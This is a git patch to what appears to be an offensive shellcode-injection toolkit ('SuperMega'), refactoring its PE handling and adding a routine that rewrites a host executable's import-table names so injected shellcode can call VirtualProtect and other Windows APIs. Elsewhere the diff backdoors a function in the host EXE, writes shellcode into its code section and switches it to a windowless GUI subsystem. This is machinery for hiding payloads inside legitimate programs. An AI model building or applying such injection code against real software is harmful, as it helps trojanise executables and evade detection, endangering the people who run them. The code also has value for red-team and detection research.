From b8c834ac565e01c3e1eca95ec34cbf72c8577e36 Mon Sep 17 00:00:00 2001 From: Dobin Date: Mon, 6 May 2024 11:00:50 +0100 Subject: [PATCH] feature: patch missing iat (+refactor: remove ExeHost) --- app/views_project.py | 14 +---- model/carrier.py | 29 ++++++--- model/exehost.py | 111 --------------------------------- model/project.py | 5 +- pe/superpe.py | 145 ++++++++++++++++++++++++++++++++++++++----- phases/compiler.py | 1 - phases/injector.py | 50 +++++++++------ supermega.py | 28 ++++----- 8 files changed, 200 insertions(+), 183 deletions(-) delete mode 100644 model/exehost.py diff --git a/app/views_project.py b/app/views_project.py index 33d5a59..a77fc97 100644 --- a/app/views_project.py +++ b/app/views_project.py @@ -21,7 +21,6 @@ from phases.injector import verify_injected_exe from helper import run_process_checkret, run_exe from model.project import prepare_project from pe.superpe import SuperPe -from model.exehost import ExeHost import pe.dllresolver @@ -87,22 +86,13 @@ def project(name): has_rodata_section = superpe.has_rodata_section() if has_rodata_section: - exehost = ExeHost(project.settings.inject_exe_in) - exehost.init() - data_sect_largest_gap_size = exehost.get_rdata_relocmanager().find_largest_gap() + superpe.get_rdata_relocmanager().find_largest_gap() unresolved_dlls = pe.dllresolver.unresolved_dlls(superpe) - project_dir = os.path.dirname(os.path.abspath(project.settings.inject_exe_out)) log_files = get_logfiles(project.settings.main_dir) - exes = list_files_and_sizes(PATH_EXES, prepend=PATH_EXES) exes += list_files_and_sizes(PATH_EXES_MORE, prepend=PATH_EXES_MORE) - #for file in - # exes.append(PATH_EXES + file) - #for file in os.listdir(PATH_EXES_MORE): - # exes.append(PATH_EXES_MORE + file) - shellcodes = list_files_and_sizes(PATH_SHELLCODES) function_invoke_styles = [(color.name, color.value) for color in FunctionInvokeStyle] @@ -135,6 +125,7 @@ def project(name): has_remote=has_remote, ) + def list_files_and_sizes(directory, prepend=""): # List all files in the directory and get their sizes files_and_sizes = [] @@ -148,6 +139,7 @@ def list_files_and_sizes(directory, prepend=""): }) return files_and_sizes + @views_project.route("/project_add", methods=['POST', 'GET']) def add_project(): if request.method == 'POST': diff --git a/model/carrier.py b/model/carrier.py index 7539610..09a6b54 100644 --- a/model/carrier.py +++ b/model/carrier.py @@ -1,5 +1,9 @@ from typing import Dict, List import logging +import pefile + +from model.defs import * +from pe.superpe import SuperPe, PeSection logger = logging.getLogger("Carrier") @@ -13,22 +17,33 @@ class IatRequest(): class DataReuseEntry(): def __init__(self, string_ref: str): - self.string_ref = string_ref # "$SG72513" + self.string_ref: str = string_ref # "$SG72513" - self.register = "" # "rcx" - self.randbytes = b"" # placeholder - self.data = b'' - self.addr = 0 + self.register: str = "" # "rcx" + self.randbytes: bytes = b"" # placeholder + self.data: bytes = b'' + self.addr: int = 0 class Carrier(): - def __init__(self): + def __init__(self, exe_file: str): self.iat_requests: List[IatRequest] = [] self.reusedata_fixups: List[DataReuseEntry] = [] + self.exe_filepath: str = exe_file + self.superpe: SuperPe = None def init(self): - pass + self.superpe = SuperPe(self.exe_filepath) + + + def get_unresolved_iat(self): + """Returns a list of IAT entries not available in the PE file""" + functions = [] + for iat in self.iat_requests: + if self.superpe.get_vaddr_of_iatentry(iat.name) == None: + functions.append(iat.name) + return functions # IAT diff --git a/model/exehost.py b/model/exehost.py deleted file mode 100644 index 9534aeb..0000000 --- a/model/exehost.py +++ /dev/null @@ -1,111 +0,0 @@ -from typing import Dict, List -import logging -import pefile -from intervaltree import Interval, IntervalTree - -from model.defs import * -import pe.pehelper as pehelper -from pe.superpe import SuperPe, PeSection -from model.carrier import Carrier -from model.rangemanager import RangeManager - -logger = logging.getLogger("ExeHost") - - -class ExeHost(): - def __init__(self, filepath: FilePath): - self.filepath: FilePath = filepath - - # we keep this open - # And modify the EXE through this at the end - self.superpe: SuperPe = None - - self.iat: Dict[str, IatEntry] = {} - self.base_relocs: List[PeRelocEntry] = [] - self.base_reloc_ranges: RangeManager = None - - self.image_base: int = 0 - self.dynamic_base: bool = False - self.code_section = None - self.rwx_section = None - - - def init(self): - logger.info("--[ Analyzing: {}".format(self.filepath)) - self.superpe = SuperPe(self.filepath) - - if not self.superpe.is_64(): - logger.warn("Binary is not 64bit: {}".format(self.filepath)) - return - #raise Exception("Binary is not 64bit: {}".format(self.filepath)) - - # image base - self.image_base = self.superpe.pe.OPTIONAL_HEADER.ImageBase - - # dynamic base / ASLR - if self.superpe.pe.OPTIONAL_HEADER.DllCharacteristics & pefile.DLL_CHARACTERISTICS['IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE']: - self.dynamic_base = True - else: - self.dynamic_base = False - - # code section we inject to, usually .text - self.code_section = self.superpe.get_code_section() - logger.info("---[ Injectable: Chosen code section: {} at 0x{:X} size: {}".format( - self.code_section.Name.decode().rstrip('\x00'), - self.code_section.VirtualAddress, - self.code_section.Misc_VirtualSize)) - - # if there is a rwx section, None otherwise - self.rwx_section = self.superpe.get_rwx_section() - - # relocs - self.base_relocs = self.superpe.get_base_relocs() - - # IAT - self.iat = self.superpe.get_iat_entries() - - - def get_vaddr_of_iatentry(self, func_name: str) -> int: - for dll_name in self.iat: - for entry in self.iat[dll_name]: - if entry.func_name == func_name: - return entry.iat_vaddr - return None - - - def get_relocations_for_section(self, section_name: str) -> List[PeRelocEntry]: - section: PeSection = self.superpe.get_section_by_name(section_name) - if section is None: - return [] - ret = [] - - #return [reloc for reloc in self.base_relocs if reloc.base_rva == section.virt_addr] - for reloc in self.base_relocs: - reloc_addr = reloc.rva - if reloc_addr >= section.virt_addr and reloc_addr < section.virt_addr + section.virt_size: - ret.append(reloc) - return ret - - - def get_rdata_relocmanager(self) -> RangeManager: - section = self.superpe.get_section_by_name(".rdata") - relocs = self.get_relocations_for_section(".rdata") - #print("Relocs for .rdata: {} of {}".format(len(relocs), len(self.base_relocs))) - - rm = RangeManager(section.virt_addr, section.virt_addr + section.virt_size) - for reloc in relocs: - # Reloc destination is probably 8 bytes - # But i add another 8 to skip over small holes (common in .rdata) - rm.add_range(reloc.rva, reloc.rva + 8 + 8) - rm.merge_overlaps() - return rm - - - def has_all_carrier_functions(self, carrier: Carrier): - is_ok = True - for iat_entry in carrier.iat_requests: - addr = self.get_vaddr_of_iatentry(iat_entry.name) - if addr == 0: - logging.info("---( Function not available as import: {}".format(iat_entry.name)) - is_ok = False - return is_ok \ No newline at end of file diff --git a/model/project.py b/model/project.py index 89e1ea4..142b946 100644 --- a/model/project.py +++ b/model/project.py @@ -3,7 +3,6 @@ import shutil from model.defs import * from model.payload import Payload -from model.exehost import ExeHost from model.settings import Settings from model.carrier import Carrier @@ -23,8 +22,7 @@ class Project(): self.comment: str = "" self.settings: Settings = settings self.payload: Payload = Payload(self.settings.payload_path) - self.exe_host: ExeHost = ExeHost(self.settings.inject_exe_in) - self.carrier: Carrier = Carrier() + self.carrier: Carrier = Carrier(self.settings.inject_exe_in) self.project_dir: str = "" self.project_exe: str = "" @@ -32,7 +30,6 @@ class Project(): def init(self): self.payload.init() - self.exe_host.init() self.carrier.init() diff --git a/pe/superpe.py b/pe/superpe.py index 5cd81af..e95c624 100644 --- a/pe/superpe.py +++ b/pe/superpe.py @@ -4,6 +4,7 @@ import logging from typing import List, Dict from model.defs import * +from model.rangemanager import RangeManager logger = logging.getLogger("superpe") @@ -61,6 +62,18 @@ class SuperPe(): return False + def get_image_base(self) -> int: + return self.pe.OPTIONAL_HEADER.ImageBase + + + def is_dynamic_base(self) -> bool: + # dynamic base / ASLR + if self.pe.OPTIONAL_HEADER.DllCharacteristics & pefile.DLL_CHARACTERISTICS['IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE']: + return True + else: + return False + + ## Entrypoint def get_entrypoint(self) -> int: @@ -122,7 +135,7 @@ class SuperPe(): def patch_subsystem(self): if self.pe.OPTIONAL_HEADER.Subsystem != pefile.SUBSYSTEM_TYPE['IMAGE_SUBSYSTEM_WINDOWS_GUI']: - logger.info("EXE is not a GUI application. Patching subsystem to GUI") + logger.info("PE is not a GUI application. Patching subsystem to GUI") self.pe.OPTIONAL_HEADER.Subsystem = pefile.SUBSYSTEM_TYPE['IMAGE_SUBSYSTEM_WINDOWS_GUI'] @@ -138,22 +151,6 @@ class SuperPe(): reloc_type = pefile.RELOCATION_TYPE[entry.type][0] base_relocs.append(PeRelocEntry(rva, base_rva, reloc_type)) return base_relocs - - - def get_iat_entries(self) -> Dict[str, IatEntry]: - iat = {} - for entry in self.pe.DIRECTORY_ENTRY_IMPORT: - for imp in entry.imports: - dll_name = entry.dll.decode('utf-8') - if imp.name == None: - continue - imp_name = imp.name.decode('utf-8') - imp_addr = imp.address - - if not dll_name in iat: - iat[dll_name] = [] - iat[dll_name].append(IatEntry(dll_name, imp_name, imp_addr)) - return iat def getSectionIndexByDataDir(self, dirIndex): @@ -292,6 +289,120 @@ class SuperPe(): if exp["name"] == dllfunc: return exp["size"] return None + + + ## Relocations + + def get_rdata_relocmanager(self) -> RangeManager: + section = self.get_section_by_name(".rdata") + relocs = self.get_relocations_for_section(".rdata") + rm = RangeManager(section.virt_addr, section.virt_addr + section.virt_size) + for reloc in relocs: + # Reloc destination is probably 8 bytes + # But i add another 8 to skip over small holes (common in .rdata) + rm.add_range(reloc.rva, reloc.rva + 8 + 8) + rm.merge_overlaps() + return rm + + + def get_relocations_for_section(self, section_name: str) -> List[PeRelocEntry]: + section: PeSection = self.get_section_by_name(section_name) + ret = [] + if section is None: + return ret + for reloc in self.get_base_relocs(): + reloc_addr = reloc.rva + if reloc_addr >= section.virt_addr and reloc_addr < section.virt_addr + section.virt_size: + ret.append(reloc) + return ret + + + ## IAT related + + def get_vaddr_of_iatentry(self, func_name: str) -> int: + iat = self.get_iat_entries() + for dll_name in iat: + for entry in iat[dll_name]: + if entry.func_name == func_name: + return entry.iat_vaddr + return None + + + def get_iat_entries(self) -> Dict[str, IatEntry]: + iat = {} + for entry in self.pe.DIRECTORY_ENTRY_IMPORT: + for imp in entry.imports: + dll_name = entry.dll.decode('utf-8') + if imp.name == None: + continue + imp_name = imp.name.decode('utf-8') + imp_addr = imp.address + + if not dll_name in iat: + iat[dll_name] = [] + iat[dll_name].append(IatEntry(dll_name, imp_name, imp_addr)) + return iat + + + def get_iat_name_for(self, dll_name: str, func_name: str) -> str: + iat = self.get_iat_entries() + for entry in iat[dll_name]: + if len(entry.func_name) >= len(func_name): + return entry.func_name + return None + + + def get_iat_offset_by_nr(self, dll_name: str, nr: int) -> int: + encoded_dllname = dll_name + + for entry in self.pe.DIRECTORY_ENTRY_IMPORT: + dllname = entry.dll.decode("ascii").rstrip("\x00").lower() + if dllname != encoded_dllname: + continue + + return entry.imports[nr].name_offset + return None + + + def get_iat_offset_by_name(self, dll_name: str, func_name: str) -> int: + # Iterate over the imported modules and their imported functions + encoded_dllname = dll_name.lower() + encoded_funcname = func_name.lower() + + for entry in self.pe.DIRECTORY_ENTRY_IMPORT: + dllname = entry.dll.decode("ascii").rstrip("\x00").lower() + if dllname != encoded_dllname: + continue + for imp in entry.imports: + # Check if the current import name matches the one we want to change + funcname = imp.name.decode("ascii").rstrip("\x00").lower() + if funcname == encoded_funcname: + return imp.name_offset + break + return None + + + def patch_iat_entry(self, dll_name: str, func_name: str, new_func_name: str): + offset = self.get_iat_offset_by_name(dll_name, func_name) + if offset is None: + raise Exception(f"Import {func_name} not found.") + + # Change the import name + # Here we need to ensure the new name fits within the space allocated to the old name + if len(new_func_name) > len(func_name): + raise ValueError("New import name is longer than the original name.") + + # Pad the new name with null bytes if it's shorter + new_name_bytes = new_func_name.encode("ascii") + b'\x00' * (len(func_name) - len(new_func_name)) + + # Overwrite the name in the file data + logger.info(" Patch IAT entry at offset 0x{:X} from {} to {}".format( + offset, func_name, new_name_bytes.decode())) + self.pe.set_bytes_at_offset(offset, new_name_bytes) + + #res = self.get_iat_offset_by_name(dll_name, new_func_name) + #logger.info("-> RES: {}".format(res)) + ## Helpers diff --git a/phases/compiler.py b/phases/compiler.py index 0c873e2..79fba5a 100644 --- a/phases/compiler.py +++ b/phases/compiler.py @@ -10,7 +10,6 @@ from observer import observer from model import * from phases.masmshc import masm_shc, Params from model.carrier import Carrier -from model.exehost import ExeHost from phases.asmparser import parse_asm_file logger = logging.getLogger("Compiler") diff --git a/phases/injector.py b/phases/injector.py index 318f79e..8242654 100644 --- a/phases/injector.py +++ b/phases/injector.py @@ -2,10 +2,10 @@ from helper import * import logging import time import logging +from typing import Dict, List from model.carrier import Carrier, DataReuseEntry from pe.pehelper import * -from model.exehost import * from observer import observer from pe.derbackdoorer import FunctionBackdoorer from pe.superpe import SuperPe @@ -34,15 +34,30 @@ def inject_exe( # And check if it fits into the target code section main_shc = file_readall_binary(main_shc_path) shellcode_len = len(main_shc) - if shellcode_len + 128 > project.exe_host.code_section.Misc_VirtualSize: + code_sect_size = project.carrier.superpe.get_code_section().Misc_VirtualSize + if shellcode_len + 128 > code_sect_size: raise Exception("Error: Shellcode {}+128 too small for target code section {}".format( - shellcode_len, project.exe_host.code_section.Misc_VirtualSize + shellcode_len, code_sect_size )) # superpe is a representation of the exe file. We gonna modify it, and save it at the end. superpe = SuperPe(exe_in) function_backdoorer = FunctionBackdoorer(superpe) + # Patch IAT if necessary + if source_style == FunctionInvokeStyle.iat_reuse: + for iatRequest in project.carrier.get_all_iat_requests(): + iat_name = superpe.get_iat_name_for("KERNEL32.dll", iatRequest.name) + superpe.patch_iat_entry("KERNEL32.dll", iat_name, iatRequest.name) + + #iat_name_a = superpe.get_iat_name_for("KERNEL32.dll", "GetEnvironmentVariableW") + #iat_name_b = superpe.get_iat_name_for("KERNEL32.dll", "VirtualProtect") + #logger.info("Using: {} and {}".format(iat_name_a, iat_name_b)) + + #superpe.patch_iat_entry("KERNEL32.dll", iat_name_a, "GetEnvironmentVariableW") + #superpe.patch_iat_entry("KERNEL32.dll", iat_name_b, "VirtualProtect") + superpe.pe.parse_data_directories() + shellcode_offset: int = 0 # file offset if superpe.is_dll() and settings.dllfunc != "" and carrier_invoke_style == CarrierInvokeStyle.ChangeEntryPoint: # Special case. put it at the beginning of the exported DLL function @@ -109,8 +124,8 @@ def inject_exe( function_backdoorer.backdoor_function(addr, shellcode_rva, shellcode_len) if source_style == FunctionInvokeStyle.iat_reuse: - injected_fix_iat(superpe, project.carrier, project.exe_host) - injected_fix_data(superpe, project.carrier, project.exe_host) + injected_fix_iat(superpe, project.carrier) + injected_fix_data(superpe, project.carrier) # changes from console to UI (no console window) if necessary superpe.patch_subsystem() @@ -129,31 +144,30 @@ def inject_exe( # observer.add_code_file("exe_extracted_jmp", jmp_code) -def injected_fix_iat(superpe: SuperPe, carrier: Carrier, exe_host: ExeHost): +def injected_fix_iat(superpe: SuperPe, carrier: Carrier): """replace IAT-placeholders in shellcode with call's to the IAT""" code = superpe.get_code_section_data() - for iatRequest in carrier.get_all_iat_requests(): if not iatRequest.placeholder in code: raise Exception("IatResolve ID {} not found, abort".format(iatRequest.placeholder)) - destination_virtual_address = exe_host.get_vaddr_of_iatentry(iatRequest.name) + offset_from_code = code.index(iatRequest.placeholder) + + # Note that the SuperPe may already have been patched for new IAT imports + destination_virtual_address = superpe.get_vaddr_of_iatentry(iatRequest.name) if destination_virtual_address == None: raise Exception("IatResolve: Function {} not found".format(iatRequest.name)) - offset_from_code = code.index(iatRequest.placeholder) - instruction_virtual_address = offset_from_code + exe_host.image_base + exe_host.code_section.VirtualAddress + instruction_virtual_address = offset_from_code + carrier.superpe.get_image_base() + carrier.superpe.get_code_section().VirtualAddress logger.info(" Replace {} at VA 0x{:X} with: call to IAT at VA 0x{:X}".format( iatRequest.placeholder.hex(), instruction_virtual_address, destination_virtual_address )) - jmp = assemble_relative_call( - instruction_virtual_address, destination_virtual_address - ) + jmp = assemble_relative_call(instruction_virtual_address, destination_virtual_address) code = code.replace(iatRequest.placeholder, jmp) superpe.write_code_section_data(code) -def injected_fix_data(superpe: SuperPe, carrier: Carrier, exe_host: ExeHost): +def injected_fix_data(superpe: SuperPe, carrier: Carrier): """Inject shellcode-data into .rdata and replace reusedata_fixup placeholders in code with LEA""" # Insert my data into the .rdata section. # Chose and save each datareuse_fixup's addres. @@ -163,11 +177,11 @@ def injected_fix_data(superpe: SuperPe, carrier: Carrier, exe_host: ExeHost): return # Put stuff into .rdata section in the PE - peSection = exe_host.superpe.get_section_by_name(".rdata") + peSection = carrier.superpe.get_section_by_name(".rdata") if peSection == None: raise Exception("No .rdata section found, abort") - rm = exe_host.get_rdata_relocmanager() + rm = carrier.superpe.get_rdata_relocmanager() if True: # FIXME this is a hack which is sometimes necessary sect_data_copy = peSection.pefile_section.get_data() @@ -190,7 +204,7 @@ def injected_fix_data(superpe: SuperPe, carrier: Carrier, exe_host: ExeHost): rm.add_range(hole[0], hole[1]) # mark it as used var_data = datareuse_fixup.data superpe.pe.set_bytes_at_offset(fixup_offset_rdata, var_data) - datareuse_fixup.addr = fixup_offset_rdata + peSection.virt_addr + exe_host.image_base - peSection.raw_addr + datareuse_fixup.addr = fixup_offset_rdata + peSection.virt_addr + carrier.superpe.get_image_base() - peSection.raw_addr logging.info(" Add data to .rdata at 0x{:X} (off: {}): {}".format( datareuse_fixup.addr, fixup_offset_rdata, var_data.decode('utf-16le'))) fixup_offset_rdata += len(var_data) + 8 @@ -204,7 +218,7 @@ def injected_fix_data(superpe: SuperPe, carrier: Carrier, exe_host: ExeHost): datareuse_fixup.randbytes)) offset_from_datasection = code.index(datareuse_fixup.randbytes) - instruction_virtual_address = offset_from_datasection + exe_host.image_base + exe_host.code_section.VirtualAddress + instruction_virtual_address = offset_from_datasection + carrier.superpe.get_image_base() + carrier.superpe.get_code_section().VirtualAddress destination_virtual_address = datareuse_fixup.addr logger.info(" Replace {} at VA 0x{:X} with LEA {} .rdata 0x{:X}".format( datareuse_fixup.randbytes.hex(), instruction_virtual_address, datareuse_fixup.register, destination_virtual_address diff --git a/supermega.py b/supermega.py index e6d5a9c..5c1a141 100644 --- a/supermega.py +++ b/supermega.py @@ -135,8 +135,9 @@ def start_real(settings: Settings): # Load our input project = Project(settings) project.init() + # check if 64 bit - if not project.exe_host.superpe.is_64(): + if not project.carrier.superpe.is_64(): raise Exception("Binary is not 64bit: {}".format(project.settings.inject_exe_in)) logger.warning("--I FunctionInvokeStyle: {} Inject Mode: {} DecoderStyle: {}".format( @@ -157,12 +158,11 @@ def start_real(settings: Settings): # we have the required IAT entries in carrier.iat_requests # Check if all are available, or abort (early check) if settings.source_style == FunctionInvokeStyle.iat_reuse: - functions = [] - for iat in project.carrier.iat_requests: - if project.exe_host.get_vaddr_of_iatentry(iat.name) == None: - functions.append(iat.name) - if len(functions) > 0: - raise Exception("IAT entry not found: {}".format(", ".join(functions))) + functions = project.carrier.get_unresolved_iat() + if len(functions) != 0: + #raise Exception("IAT entry not found: {}".format(", ".join(functions))) + logger.warn("IAT entry not found: {}".format(", ".join(functions))) + pass # Assemble: Assemble .asm to .shc (ASM -> SHC) if settings.generate_shc_from_asm: @@ -180,13 +180,13 @@ def start_real(settings: Settings): decoder_style = settings.decoder_style) # RWX Injection (optional): obfuscate loader+payload - if project.exe_host.rwx_section != None: - logger.info("--[ RWX section {} found. Will obfuscate loader+payload and inject into it".format( - project.exe_host.rwx_section.Name.decode().rstrip('\x00') - )) - obfuscate_shc_loader(settings.main_shc_path, settings.main_shc_path + ".sgn") - observer.add_code_file("payload_sgn", file_readall_binary(settings.main_shc_path + ".sgn")) - shutil.move(settings.main_shc_path + ".sgn", settings.main_shc_path) + #if project.exe_host.rwx_section != None: + # logger.info("--[ RWX section {} found. Will obfuscate loader+payload and inject into it".format( + # project.exe_host.rwx_section.Name.decode().rstrip('\x00') + # )) + # obfuscate_shc_loader(settings.main_shc_path, settings.main_shc_path + ".sgn") + # observer.add_code_file("payload_sgn", file_readall_binary(settings.main_shc_path + ".sgn")) + # shutil.move(settings.main_shc_path + ".sgn", settings.main_shc_path) # inject merged loader into an exe phases.injector.inject_exe(settings.main_shc_path, settings, project)